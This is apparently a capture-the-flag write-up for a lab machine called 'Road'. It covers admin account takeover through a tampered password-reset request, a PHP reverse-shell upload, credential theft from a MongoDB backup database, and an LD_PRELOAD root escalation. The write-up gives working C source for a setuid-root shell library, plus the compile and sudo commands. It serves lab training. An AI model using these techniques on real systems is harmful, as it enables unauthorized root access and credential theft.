Road

Vertical PrivEsc to admin - PHP File upload - Lateral Move via MongoDB - LD_PRELOAD PrivEsc to Root

  • Let's start by performing some active reconnaissance by running Nmap to scan for open ports

  • Enumerating the web application gives us options to either Log In or Sign In, since we dont have valid creds we can sign in as a test user and proceed to the dashboard interface

  • Once logged in as the user, we find that a user has a profile page and can upload a profile image :)

However, only the admin has the access to that feature. That being said, we retrieve the admin email as admin@sky.thm which is written in cleartext on the page

  • So how do we escalate our privileges as an admin, there are no JWT cookies :(

  • Observe the reset user page, The Username field is greyed out and only the password fields are editable - Let's quickly intercept that request and change the test user to admin user with the same password and get admin access :)

  • Now we sign in as admin@sky.thm and we can successfully upload a profile image.

  • Inspecting the source code of the profile page. We find a Url pathname has been commented out and it seems to be a reasonable location of where the uploaded profile images are stored

/v2/profileimages/

  • So now to trigger the reverse-shell, we can simply visit the 

http://10.10.113.161/v2/profileimages/php-reverse-shell.php

Lateral Movement (www => webdeveloper)

  • We find out there are MongoDB and MySQL users in the /etc/passwd file

  • Which indicates that MongoDB might be running

we can get to know what all users are there on the system by running - getent passwd command

  • We conclude that MongoDB is indeed running. And we can now spin up MongoDB by running mongo on the terminal

  • Enter show dbs to list the available databases. The backup database looks the most interesting

  • Enter use backup to access the backup database.

  • Enter show collections;to list the tables on the database. We find a table user which could be interesting

  • Enter db.user.find(); to read the contents of the table. Bam! we obtain passwords for the user webdeveloper

Privilege Escalation

  • Enumerating this user, we use thesudo -l command to list all commands the webdeveloper user can run using sudo

  • LD_PRELOAD is a function that allows any program to use shared libraries(.so)

  • It pre_loads the .so files to the actual binary before even the program is executed during the run-time

  • In Order to exploit this vulnerability, we'll have to write a C program and compile it as a shared library

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() 
{
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

  • We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters and transfer it our victim machine

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

  • Now let's shoot our vulnerable binary as 

$ sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
root@sky:/home/webdeveloper# whoami
root
Previous0dayNextInferno

Last updated